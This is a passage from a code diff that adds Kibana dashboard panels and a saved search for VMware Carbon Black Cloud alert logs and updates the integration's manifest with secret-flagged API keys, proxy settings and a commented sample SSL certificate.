"c595f8ee-2027-4013-9e5f-8761f03a0e50": { + "columnOrder": [ + "5b59064d-7111-4c36-b053-2e01e2edc89e", + "de35e845-0662-4d2f-95e7-c63ac9869d73" + ], + "columns": { + "5b59064d-7111-4c36-b053-2e01e2edc89e": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Policy Applied", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "de35e845-0662-4d2f-95e7-c63ac9869d73", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.policy_applied" + }, + "de35e845-0662-4d2f-95e7-c63ac9869d73": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "groups": [ + "5b59064d-7111-4c36-b053-2e01e2edc89e" + ], + "layerId": "c595f8ee-2027-4013-9e5f-8761f03a0e50", + "layerType": "data", + "legendDisplay": "default", + "metric": "de35e845-0662-4d2f-95e7-c63ac9869d73", + "nestedLegend": false, + "numberDisplay": "percent" + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "9944eade-0fb2-43c6-bb07-7013276204bd", + "w": 24, + "x": 0, + "y": 90 + }, + "panelIndex": "9944eade-0fb2-43c6-bb07-7013276204bd", + "title": "Distribution of Alerts by Policy Applied [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f4d3ca9c-1cdc-485c-84c8-dc6576838cf2", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "f4d3ca9c-1cdc-485c-84c8-dc6576838cf2": { + "columnOrder": [ + "99f69caa-f364-4b62-bdcd-9737f5646dcb", + "c984bc20-53ab-4d99-b212-bfb86427b9bb" + ], + "columns": { + "99f69caa-f364-4b62-bdcd-9737f5646dcb": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Workflow Status", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "c984bc20-53ab-4d99-b212-bfb86427b9bb", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.workflow.status" + }, + "c984bc20-53ab-4d99-b212-bfb86427b9bb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "groups": [ + "99f69caa-f364-4b62-bdcd-9737f5646dcb" + ], + "layerId": "f4d3ca9c-1cdc-485c-84c8-dc6576838cf2", + "layerType": "data", + "legendDisplay": "default", + "metric": "c984bc20-53ab-4d99-b212-bfb86427b9bb", + "nestedLegend": false, + "numberDisplay": "percent" + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "441f493c-7ead-42b8-940d-2d1ef599ce56", + "w": 24, + "x": 24, + "y": 120 + }, + "panelIndex": "441f493c-7ead-42b8-940d-2d1ef599ce56", + "title": "Distribution of Alerts by Workflow Status [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-5b33df3c-e952-4285-af67-3ffb4f50d53f", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "5b33df3c-e952-4285-af67-3ffb4f50d53f": { + "columnOrder": [ + "13cd1e9f-b2d7-4148-b0aa-248304fdaa39", + "1379a65d-f0af-4020-8f4b-a3064c018d93" + ], + "columns": { + "1379a65d-f0af-4020-8f4b-a3064c018d93": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "13cd1e9f-b2d7-4148-b0aa-248304fdaa39": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Process Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "1379a65d-f0af-4020-8f4b-a3064c018d93", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "process.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "1379a65d-f0af-4020-8f4b-a3064c018d93" + ], + "layerId": "5b33df3c-e952-4285-af67-3ffb4f50d53f", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "13cd1e9f-b2d7-4148-b0aa-248304fdaa39" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_horizontal_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "4103b75e-506f-48d5-ac42-38c4f2063b16", + "w": 24, + "x": 0, + "y": 105 + }, + "panelIndex": "4103b75e-506f-48d5-ac42-38c4f2063b16", + "title": "Distribution of Alerts by Process Name [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-15dfbaf6-974c-4236-bdb5-45f708c73c36", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "15dfbaf6-974c-4236-bdb5-45f708c73c36": { + "columnOrder": [ + "625766df-0169-4855-b2b2-dcdc79745f19", + "2113f826-3766-4711-b24a-6ccf31db4eb5" + ], + "columns": { + "2113f826-3766-4711-b24a-6ccf31db4eb5": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "625766df-0169-4855-b2b2-dcdc79745f19": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Potential Malicious Activities - TTPS", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "2113f826-3766-4711-b24a-6ccf31db4eb5", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.ttps" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "2113f826-3766-4711-b24a-6ccf31db4eb5" + ], + "layerId": "15dfbaf6-974c-4236-bdb5-45f708c73c36", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "625766df-0169-4855-b2b2-dcdc79745f19" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_horizontal_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "a38f5bf4-59a4-434f-a12b-c6355e71b3e3", + "w": 24, + "x": 24, + "y": 135 + }, + "panelIndex": "a38f5bf4-59a4-434f-a12b-c6355e71b3e3", + "title": "Distribution of Alerts by Potential Malicious Activities - TTPS [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-fd06a4f8-b0db-44c0-8cf7-d5c80233ab8c", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "fd06a4f8-b0db-44c0-8cf7-d5c80233ab8c": { + "columnOrder": [ + "91aa5d6a-c860-40ad-8d56-cb292d4a0cd5", + "12f152c7-a887-4c9a-9a3f-71a3c6e60e9b" + ], + "columns": { + "12f152c7-a887-4c9a-9a3f-71a3c6e60e9b": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "91aa5d6a-c860-40ad-8d56-cb292d4a0cd5": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Reason Codes", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "12f152c7-a887-4c9a-9a3f-71a3c6e60e9b", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.reason_code" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "91aa5d6a-c860-40ad-8d56-cb292d4a0cd5", + "isTransposed": false + }, + { + "columnId": "12f152c7-a887-4c9a-9a3f-71a3c6e60e9b", + "isTransposed": false + } + ], + "layerId": "fd06a4f8-b0db-44c0-8cf7-d5c80233ab8c", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "ccd8a34c-d68c-4471-aca6-d41e1185f176", + "w": 24, + "x": 24, + "y": 150 + }, + "panelIndex": "ccd8a34c-d68c-4471-aca6-d41e1185f176", + "title": "Top 10 Reason Codes [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-48c8290b-b387-4b56-a430-d49851725caa", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "48c8290b-b387-4b56-a430-d49851725caa": { + "columnOrder": [ + "ef64b3a4-8de3-4669-a35f-1ecc9e29ce2c", + "d1d440ef-ba5c-4b3f-85a8-da4e8014c1af" + ], + "columns": { + "d1d440ef-ba5c-4b3f-85a8-da4e8014c1af": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "ef64b3a4-8de3-4669-a35f-1ecc9e29ce2c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Malicious Process Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "d1d440ef-ba5c-4b3f-85a8-da4e8014c1af", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.process.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "ef64b3a4-8de3-4669-a35f-1ecc9e29ce2c", + "isTransposed": false + }, + { + "columnId": "d1d440ef-ba5c-4b3f-85a8-da4e8014c1af", + "isTransposed": false + } + ], + "layerId": "48c8290b-b387-4b56-a430-d49851725caa", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "4e0459b0-fe4a-4199-8846-8a59e854e277", + "w": 24, + "x": 0, + "y": 135 + }, + "panelIndex": "4e0459b0-fe4a-4199-8846-8a59e854e277", + "title": "Top 10 Malicious Process Names [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-811141f4-f8d2-4a91-9702-0341d0efa27c", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "811141f4-f8d2-4a91-9702-0341d0efa27c": { + "columnOrder": [ + "c5ab6ff0-1969-48a0-9f14-7afe2506527b", + "ddc99f56-464c-45cb-9c13-530c4c9488cc" + ], + "columns": { + "c5ab6ff0-1969-48a0-9f14-7afe2506527b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "IOC Hit", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "ddc99f56-464c-45cb-9c13-530c4c9488cc", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "carbon_black_cloud.alert.ioc.hit" + }, + "ddc99f56-464c-45cb-9c13-530c4c9488cc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "c5ab6ff0-1969-48a0-9f14-7afe2506527b", + "isTransposed": false + }, + { + "columnId": "ddc99f56-464c-45cb-9c13-530c4c9488cc", + "isTransposed": false + } + ], + "layerId": "811141f4-f8d2-4a91-9702-0341d0efa27c", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "07a8d03f-6b85-46c4-8fce-9bf5a09b5139", + "w": 24, + "x": 0, + "y": 165 + }, + "panelIndex": "07a8d03f-6b85-46c4-8fce-9bf5a09b5139", + "title": "Top 10 IOC Hit [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a754e5d3-8c59-44be-9431-ecba97548823", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "a754e5d3-8c59-44be-9431-ecba97548823": { + "columnOrder": [ + "e70a2d5f-e544-4da5-b796-4f1a028470ea", + "69db9731-3d82-4086-b12c-885a7088cdc0" + ], + "columns": { + "69db9731-3d82-4086-b12c-885a7088cdc0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "Records" + }, + "e70a2d5f-e544-4da5-b796-4f1a028470ea": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Username", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "69db9731-3d82-4086-b12c-885a7088cdc0", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "user.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "e70a2d5f-e544-4da5-b796-4f1a028470ea", + "isTransposed": false + }, + { + "columnId": "69db9731-3d82-4086-b12c-885a7088cdc0", + "isTransposed": false + } + ], + "layerId": "a754e5d3-8c59-44be-9431-ecba97548823", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "477eae84-de2f-49ba-acd3-b7cb615d0009", + "w": 24, + "x": 0, + "y": 150 + }, + "panelIndex": "477eae84-de2f-49ba-acd3-b7cb615d0009", + "title": "Top 10 Device Username [Logs Carbon Black Cloud]", + "type": "lens", + "version": "7.17.0" + }, + { + "embeddableConfig": { + "enhancements": {} + }, + "gridData": { + "h": 23, + "i": "f561888f-9762-4031-9f49-7c49e436849d", + "w": 48, + "x": 0, + "y": 180 + }, + "panelIndex": "f561888f-9762-4031-9f49-7c49e436849d", + "panelRefName": "panel_f561888f-9762-4031-9f49-7c49e436849d", + "type": "search", + "version": "7.17.0" + } + ], + "timeRestore": false, + "title": "[Logs Carbon Black Cloud] Alert V7", + "version": 1 + }, + "coreMigrationVersion": "7.17.0", + "id": "carbon_black_cloud-0954fb80-3a6c-11ed-a8e8-41eb8778c6de", + "migrationVersion": { + "dashboard": "7.17.0" + }, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2fdf6d77-fb2b-4d45-9fe0-1b1395b51cad:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2fdf6d77-fb2b-4d45-9fe0-1b1395b51cad:indexpattern-datasource-layer-3a59266a-6775-483f-99a4-806d42c20187", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "824ac716-7b3f-4aab-80e3-6eb2e2eba0c3:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "824ac716-7b3f-4aab-80e3-6eb2e2eba0c3:indexpattern-datasource-layer-5d228926-1588-4273-83fb-e1e030db620d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7428974e-7e40-44ed-ae98-d5f70484cc74:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7428974e-7e40-44ed-ae98-d5f70484cc74:indexpattern-datasource-layer-4860b265-1a18-4665-bfa6-d5b45d2b4698", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "68904d73-a00c-4e08-9bfb-521ae79562db:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "68904d73-a00c-4e08-9bfb-521ae79562db:indexpattern-datasource-layer-9df0b783-d395-42ed-91d4-245d42a3ce75", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a8013a95-c2ed-45fa-a431-ab322e09732c:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a8013a95-c2ed-45fa-a431-ab322e09732c:indexpattern-datasource-layer-dec17f01-e97d-46b5-9a93-68a8160b77fc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "21f1c122-4d3a-4d58-a2e5-dc2552fe00ae:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "21f1c122-4d3a-4d58-a2e5-dc2552fe00ae:indexpattern-datasource-layer-c0723707-2be7-4bf2-9464-b3224ff13091", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "62a0100e-29b4-4859-b753-61348d6f929a:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "62a0100e-29b4-4859-b753-61348d6f929a:indexpattern-datasource-layer-5d41bec8-a673-495e-9c69-de61f95d6e2e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a9b9f69f-e15c-4ad7-aed4-50baa5bc16fb:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a9b9f69f-e15c-4ad7-aed4-50baa5bc16fb:indexpattern-datasource-layer-2e00b48b-7d5b-469f-9613-3503131f7a3f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3cbcaaf0-9ba1-4536-8192-28427cdcb8a0:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3cbcaaf0-9ba1-4536-8192-28427cdcb8a0:indexpattern-datasource-layer-fc3bcaa9-a33b-44c4-8d08-5643bf9665ae", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "68b6d1b6-b955-4b8e-8649-98404fc4e871:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "68b6d1b6-b955-4b8e-8649-98404fc4e871:indexpattern-datasource-layer-2d5596cc-8954-4cf3-b056-235b6aa9efa8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4ba78728-d819-4a52-9bfb-d3cdf9a8cdbd:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4ba78728-d819-4a52-9bfb-d3cdf9a8cdbd:indexpattern-datasource-layer-08b18428-bc7f-4e09-8277-56b698796abf", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9944eade-0fb2-43c6-bb07-7013276204bd:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9944eade-0fb2-43c6-bb07-7013276204bd:indexpattern-datasource-layer-c595f8ee-2027-4013-9e5f-8761f03a0e50", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "441f493c-7ead-42b8-940d-2d1ef599ce56:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "441f493c-7ead-42b8-940d-2d1ef599ce56:indexpattern-datasource-layer-f4d3ca9c-1cdc-485c-84c8-dc6576838cf2", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4103b75e-506f-48d5-ac42-38c4f2063b16:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4103b75e-506f-48d5-ac42-38c4f2063b16:indexpattern-datasource-layer-5b33df3c-e952-4285-af67-3ffb4f50d53f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a38f5bf4-59a4-434f-a12b-c6355e71b3e3:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a38f5bf4-59a4-434f-a12b-c6355e71b3e3:indexpattern-datasource-layer-15dfbaf6-974c-4236-bdb5-45f708c73c36", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ccd8a34c-d68c-4471-aca6-d41e1185f176:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ccd8a34c-d68c-4471-aca6-d41e1185f176:indexpattern-datasource-layer-fd06a4f8-b0db-44c0-8cf7-d5c80233ab8c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4e0459b0-fe4a-4199-8846-8a59e854e277:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4e0459b0-fe4a-4199-8846-8a59e854e277:indexpattern-datasource-layer-48c8290b-b387-4b56-a430-d49851725caa", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "07a8d03f-6b85-46c4-8fce-9bf5a09b5139:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "07a8d03f-6b85-46c4-8fce-9bf5a09b5139:indexpattern-datasource-layer-811141f4-f8d2-4a91-9702-0341d0efa27c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "477eae84-de2f-49ba-acd3-b7cb615d0009:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "477eae84-de2f-49ba-acd3-b7cb615d0009:indexpattern-datasource-layer-a754e5d3-8c59-44be-9431-ecba97548823", + "type": "index-pattern" + }, + { + "id": "carbon_black_cloud-b23c6730-3a6b-11ed-a8e8-41eb8778c6de", + "name": "f561888f-9762-4031-9f49-7c49e436849d:panel_f561888f-9762-4031-9f49-7c49e436849d", + "type": "search" + } + ], + "type": "dashboard" +} \ No newline at end of file diff --git a/packages/system/kibana/search/system-eb0039f0-fa7f-11e6-a1df-a78bd7504d38.json b/packages/carbon_black_cloud/kibana/search/carbon_black_cloud-b23c6730-3a6b-11ed-a8e8-41eb8778c6de.json similarity index 62% rename from packages/system/kibana/search/system-eb0039f0-fa7f-11e6-a1df-a78bd7504d38.json rename to packages/carbon_black_cloud/kibana/search/carbon_black_cloud-b23c6730-3a6b-11ed-a8e8-41eb8778c6de.json index 5214b472f78..52f332b9aed 100644 --- a/packages/system/kibana/search/system-eb0039f0-fa7f-11e6-a1df-a78bd7504d38.json +++ b/packages/carbon_black_cloud/kibana/search/carbon_black_cloud-b23c6730-3a6b-11ed-a8e8-41eb8778c6de.json @@ -1,19 +1,21 @@ { "attributes": { "columns": [ - "group.name", - "group.id" + "event.id", + "event.reason", + "carbon_black_cloud.alert.process.name", + "carbon_black_cloud.alert.category" ], "description": "", - "hits": 0, + "grid": {}, + "hideChart": false, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [], - "highlightAll": true, "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", "query": { "language": "kuery", - "query": "system.auth.groupadd:*" + "query": "" } } }, @@ -23,14 +25,12 @@ "desc" ] ], - "title": "groupadd logs [Logs System]", - "version": 1 + "title": "Alerts V7 Essential Details [Logs Carbon Black Cloud]" }, - "coreMigrationVersion": "8.6.1", - "created_at": "2023-03-23T04:03:56.987Z", - "id": "system-eb0039f0-fa7f-11e6-a1df-a78bd7504d38", + "coreMigrationVersion": "7.17.0", + "id": "carbon_black_cloud-b23c6730-3a6b-11ed-a8e8-41eb8778c6de", "migrationVersion": { - "search": "8.0.0" + "search": "7.9.3" }, "references": [ { diff --git a/packages/carbon_black_cloud/manifest.yml b/packages/carbon_black_cloud/manifest.yml index 4dc983d22c2..716af68aa5f 100644 --- a/packages/carbon_black_cloud/manifest.yml +++ b/packages/carbon_black_cloud/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: carbon_black_cloud title: VMware Carbon Black Cloud -version: "1.19.1" +version: "2.0.0" description: Collect logs from VMWare Carbon Black Cloud with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - edr_xdr conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/carbon_black_cloud-screenshot.png title: Carbon Black Cloud alert dashboard screenshot @@ -26,8 +26,8 @@ policy_templates: description: Collect Logs from Carbon Black Cloud. inputs: - type: httpjson - title: Collect Carbon Black Cloud logs via API - description: Collect Carbon Black Cloud logs via API. + title: Collect Carbon Black Cloud logs via API using HTTPJSON [Legacy] + description: Collect Carbon Black Cloud logs via API using HTTPJSON. vars: - name: hostname type: text @@ -56,6 +56,7 @@ policy_templates: title: Custom API Secret Key description: API Secret Key with Custom Access Level type. required: true + secret: true - name: api_id type: text title: API ID @@ -66,6 +67,75 @@ policy_templates: title: API Secret Key description: API Secret Key with API Access Level type. required: true + secret: true + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http\[s\]://:@:. Please ensure your username and password are in URL encoded format. + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. certificate_authorities, supported_protocols, verification_mode etc. + multi: false + required: false + show_user: false + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # 